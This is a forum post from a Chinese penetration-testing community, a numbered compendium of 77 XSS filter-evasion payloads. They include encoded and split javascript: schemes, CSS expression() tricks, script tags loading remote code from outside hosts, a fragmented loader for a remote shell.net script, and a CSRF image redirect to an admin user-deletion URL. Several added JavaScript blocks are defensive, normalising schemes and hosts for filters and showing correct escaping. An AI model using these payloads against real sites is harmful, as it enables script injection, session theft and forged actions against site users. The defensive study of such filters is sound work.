中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: xss详细利用大全1 (XSS exploitation compendium, part 1)
Author: admin
Time: 2012-9-13 17:04

Cross-site image shell

XSS payload: <script>alert("")</script>

Put the payload on the first line of the webshell file and rename the file with a .jpg extension; when the .jpg is requested, the payload still runs. This relies on the browser sniffing the file as HTML instead of trusting the image extension, so it fails when the server sends a real image Content-Type and the browser honours it.
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a javascript: directive

<IMG SRC="javascript:alert('XSS');">

(3) IMG tag without semicolon or quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, the scheme is case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding, decimal with semicolons (this is javascript:alert("XSS") written as decimal character references; the original page displayed it already decoded)

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (88,83,83 spell "XSS"; work the codes out with a character-code calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (payload elided in the original)

<IMG SRC=jav..omitted..S')>

(9) 7-bit long UTF-8 Unicode encoding without semicolons (payload elided in the original)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (payload elided in the original)

<IMG SRC=java..omitted..XSS')>
(11) Embedded tab to split "javascript" (a literal TAB character between jav and ascript; a plain space does not work)

<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab to split "javascript"

<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, the extreme XSS example (in the original every character of the tag sits on its own line; this page's rendering collapsed the line breaks)

<IMG SRC="javascript:alert('XSS')">
(16) Working around a length limit (all fragments must land on the same page; each script block appends a piece to z and the last one evaluates the assembled document.write that loads the remote script)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null byte (write the file with perl so the NUL survives)

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2. The original notes that null-byte tricks are basically useless in practice because there is nowhere to use them; they depended on old Internet Explorer versions ignoring a NUL inside a tag or scheme name, which current browsers do not do.

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the javascript: directive (leading whitespace and control characters are stripped before the scheme is read)

<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative URL)

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle bracket

<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons (the regex literal carries the string, a.source reads it back)

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping escaped JavaScript (for a page that backslash-escapes quotes but not backslashes: the attacker's backslash neutralises the one the filter adds, so the quote stays live and closes the string)

\";alert('XSS');//
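Added example (not code from the original post): payload (29) only works when the server escapes quotes but not backslashes. The JavaScript below shows that flawed escaper next to a JSON-based one, plus a small scanner that reads the emitted script the way the JS tokenizer would, to decide whether the string literal ends early. The template var name = "..."; and the variable name are assumptions for the demonstration.

```javascript
// Added example, not code from the original post.
// Assumed server-side template: var name = "<user value>";

// Flawed filter: backslash-escapes double quotes only. A value that ends with
// \"  becomes \\" : an escaped backslash followed by a live quote.
function naiveQuote(value) {
  return '"' + value.replace(/"/g, '\\"') + '"';
}

// Correct encoder: a JSON string literal is a valid JS string literal, and
// JSON.stringify escapes backslashes, quotes and control characters. '<' is
// escaped too so a value cannot contain a literal "</script>".
function safeQuote(value) {
  return JSON.stringify(value).replace(/</g, '\\u003c');
}

function renderScript(literal) {
  return 'var name = ' + literal + ';';
}

// Walk a double-quoted JS string literal whose opening quote is at `start`,
// honouring backslash escapes; return the index just past the closing quote,
// or -1 if it is unterminated.
function literalEnd(src, start) {
  for (let i = start + 1; i < src.length; i++) {
    if (src[i] === '\\') { i += 1; continue; } // escaped char, skip it
    if (src[i] === '"') return i + 1;
  }
  return -1;
}

// True when `value`, run through `quoter`, closes the literal before the
// template's own closing quote, so the remainder is parsed as code.
function breaksOut(value, quoter) {
  const script = renderScript(quoter(value));
  const end = literalEnd(script, script.indexOf('"'));
  return end !== script.length - 1;
}

// The code that would execute after the early close (empty string if none).
function injectedCode(value, quoter) {
  const script = renderScript(quoter(value));
  const end = literalEnd(script, script.indexOf('"'));
  return end === script.length - 1 ? '' : script.slice(end);
}

// Payload (29) from the list, exactly as the attacker types it.
const PAYLOAD_29 = "\\\";alert('XSS');//";
```

With naiveQuote the emitted line is var name = "\\";alert('XSS');//"; and everything after the second quote runs; with safeQuote the same input stays inside the literal. Escaping symbols one at a time is the wrong shape of fix; encode for the exact context (a JS string literal) and the whole payload class in (28) and (29) goes away.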
(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag event handler (no javascript: or <SCRIPT> needed)

<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) Stylesheet LINK

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with VBScript (Internet Explorer only)

<IMG SRC='vbscript:msgbox("XSS")'>
(41) META refresh to a URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE background

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character in front of the scheme (the original lists the tolerated characters as 1-32&34&39&160&8192-8&13&12288&65279, decimal; the page showed the character rendered, it is written here as &#1;)

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
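Added example (JavaScript, not code from the original post): payloads (3) to (5), (11) to (14), (19) and (47) all get past a filter that greps for the literal string javascript: because the browser decodes character references and then strips tab, newline, carriage return and leading control characters before it reads the scheme. The functions below apply those same steps, as the HTML and URL parsers do, so a sink can be checked against the decoded value instead of the raw attribute. The sample strings are constructed from the payloads in this list; NUL handling follows current parsers, not the old Internet Explorer behaviour that payload (17) relied on.

```javascript
// Added example, not code from the original post.

// Named references that matter inside URL attributes. Only the four legacy
// ones are also recognised without a trailing semicolon, as in HTML5.
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'",
                Tab: '\t', NewLine: '\n', colon: ':' };
const LEGACY = new Set(['amp', 'lt', 'gt', 'quot']);

// Decode character references: &#106; and &#106 (decimal, semicolon optional),
// &#x6A; / &#X6A (hex, semicolon optional) and the named ones above.
function decodeEntities(s) {
  return s.replace(/&#[xX]([0-9a-fA-F]+);?|&#([0-9]+);?|&([a-zA-Z]+)(;?)/g,
    (m, hex, dec, name, semi) => {
      if (hex !== undefined || dec !== undefined) {
        const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
        return cp > 0x10ffff ? m : String.fromCodePoint(cp);
      }
      if (!Object.prototype.hasOwnProperty.call(NAMED, name)) return m;
      if (semi === '' && !LEGACY.has(name)) return m;
      return NAMED[name];
    });
}

// Scheme of a URL attribute value after the steps a browser applies:
// entity decoding (HTML parser), then strip leading/trailing C0 controls and
// spaces and drop tab/LF/CR anywhere (URL parser). Returns the lower-cased
// scheme, or null when the value has none.
function schemeOf(raw) {
  let u = decodeEntities(raw);
  u = u.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '').replace(/[\t\n\r]/g, '');
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(u);
  return m ? m[1].toLowerCase() : null;
}

// The question a filter should actually ask: does this value run script?
function isScriptUrl(raw) {
  const s = schemeOf(raw);
  return s === 'javascript' || s === 'vbscript';
}

// Constructed inputs modelled on the payloads in this list. Item (11) needs a
// real tab character; a plain space inside "jav ascript" is not stripped.
const SAMPLES = {
  p3: "javascript:alert('XSS')",
  p4: "JaVaScRiPt:alert('XSS')",
  p5: "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)",
  p9: "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert(1)",
  p11: "jav\tascript:alert('XSS');",
  p12: "jav&#x09;ascript:alert('XSS');",
  p13: "jav&#x0A;ascript:alert('XSS');",
  p14: "jav&#x0D;ascript:alert('XSS');",
  p19: " &#14;  javascript:alert('XSS');",
  p47: "&#1;javascript:alert('XSS')",
  p17: "java&#0;script:alert('XSS')",
  space: "jav ascript:alert('XSS');",
  http: "http://3w.org/XSS/xss.js",
};
```

Running schemeOf over SAMPLES gives javascript for every entry except p17 (a NUL in the middle of the scheme is kept by current URL parsers, so the value has no scheme), space (an ordinary space is not one of the characters the URL parser discards) and http. The lesson for a filter is to allow-list schemes on the decoded, stripped value rather than to deny-list spellings of javascript:.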
(48) DIV expression (Internet Explorer's CSS expression() evaluates script)

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter is enough to make a tag)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with the expression keyword split by a CSS comment (this page's copy of the payload was truncated to exppression(alert("XSS"))'>; the full form is below)

<IMG STYLE='xss:expr/*XSS*/ession(alert("XSS"))'>

(53) STYLE background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that carries the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Inside the Flash file, ActionScript can smuggle in your XSS (the pieces concatenate to getURL("javascript:alert('XSS');"))

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .htc file must be on the same server as your XSS carrier

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JavaScript is filtered, put the JavaScript into an image file and load that file as a script (the SRC was left blank in the original; it points at the image that carries the JavaScript)

<SCRIPT SRC=""></SCRIPT>

(59) IMG with an embedded command. The original says this "can execute arbitrary commands"; what it actually does is make every viewer's browser send a GET to that URL with the viewer's cookies attached (cross-site request forgery), so it can only trigger whatever that URL already does for a logged-in user.

<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG with an embedded command, variant 2 (a.jpg is on the same server as the page carrying the IMG tag; the line below is an Apache Redirect rule, typically in .htaccess, that turns the image request into a request for the target's admin action, and nothing in the page source looks like anything but an image)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters (a ">" inside a quoted attribute value is harmless to the parser but confuses filters that look for the end of the tag)

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)

<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)

<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)

<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)

<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)

<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass (an IP address instead of a hostname)

<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (the percent-encoded form of http://3w.org; the original page showed it already decoded)

<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) IP as a single decimal number (3232235521 is 192.168.0.1)

<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal

<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal

<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding (the original has a newline after "h" and tab characters inside "tt p" and "6 6", all of which the URL parser discards; the host mixes decimal, octal and hex octets and is 66.102.7.147)

<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

(74) Omitting http: (protocol-relative URL)

<A HREF="//www.google.com/">XSS</A>

(75) Omitting www

<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)

<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
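Added example (JavaScript, not code from the original post): items (70) to (76) defeat a URL blocklist that only knows dotted-decimal addresses and exact hostnames. The functions below resolve an href the way a browser's URL parser does before comparing hosts: tab, newline and carriage return are discarded, each dotted part is read as hex, octal or decimal, a short form fills the remaining bytes, and a trailing dot is dropped. The hosts used in the test are the ones from the list above; the expected dotted-decimal values were worked out by hand.

```javascript
// Added example, not code from the original post.

// Parse one dotted part with the URL-standard IPv4 rules: 0x/0X prefix = hex,
// a leading 0 = octal, otherwise decimal. NaN means "not a number part".
function parseIpv4Number(part) {
  if (part === '') return NaN;
  let radix = 10;
  if (/^0[xX]/.test(part)) {
    part = part.slice(2);
    radix = 16;
    if (part === '') return 0;
  } else if (part.length > 1 && part[0] === '0') {
    part = part.slice(1);
    radix = 8;
  }
  const digits = radix === 16 ? /^[0-9a-fA-F]+$/ : radix === 8 ? /^[0-7]+$/ : /^[0-9]+$/;
  return digits.test(part) ? parseInt(part, radix) : NaN;
}

// Canonical form of a host: dotted-decimal when it parses as an IPv4 literal
// (items (70) to (73)); otherwise lower-cased with a trailing dot removed
// (item (76)). Anything the IPv4 rules reject is returned as-is.
function canonicalHost(host) {
  let h = host.toLowerCase();
  if (h.endsWith('.')) h = h.slice(0, -1);
  const parts = h.split('.');
  if (parts.length > 4) return h;
  const nums = parts.map(parseIpv4Number);
  if (nums.some(Number.isNaN)) return h;
  // every part but the last must fit a byte; the last fills the remaining bytes
  if (nums.slice(0, -1).some(n => n > 255)) return h;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return h;
  let addr = last;
  nums.slice(0, -1).forEach((n, i) => { addr += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map(shift => Math.floor(addr / 2 ** shift) % 256).join('.');
}

// Host of an href as written in the markup: remove tab/LF/CR anywhere (the
// URL parser does), then take the authority after "//", which also covers the
// protocol-relative form of item (74). Returns null for javascript: and other
// values without an authority.
function hostOf(href) {
  const u = href.replace(/[\t\n\r]/g, '');
  const m = /^(?:[a-zA-Z][a-zA-Z0-9+.-]*:)?\/\/([^\/?#]*)/.exec(u);
  if (!m) return null;
  const authority = m[1];
  const hostPort = authority.slice(authority.lastIndexOf('@') + 1); // drop userinfo
  return canonicalHost(hostPort.replace(/:\d*$/, ''));               // drop port
}
```

hostOf on the href from (73), with its real newline and tabs, comes back as 66.102.7.147, the same answer as for the plain dotted form, which is the comparison a blocklist must make. A filter that compares the raw attribute string against "192.168.0.1" matches none of (70) to (73).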
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2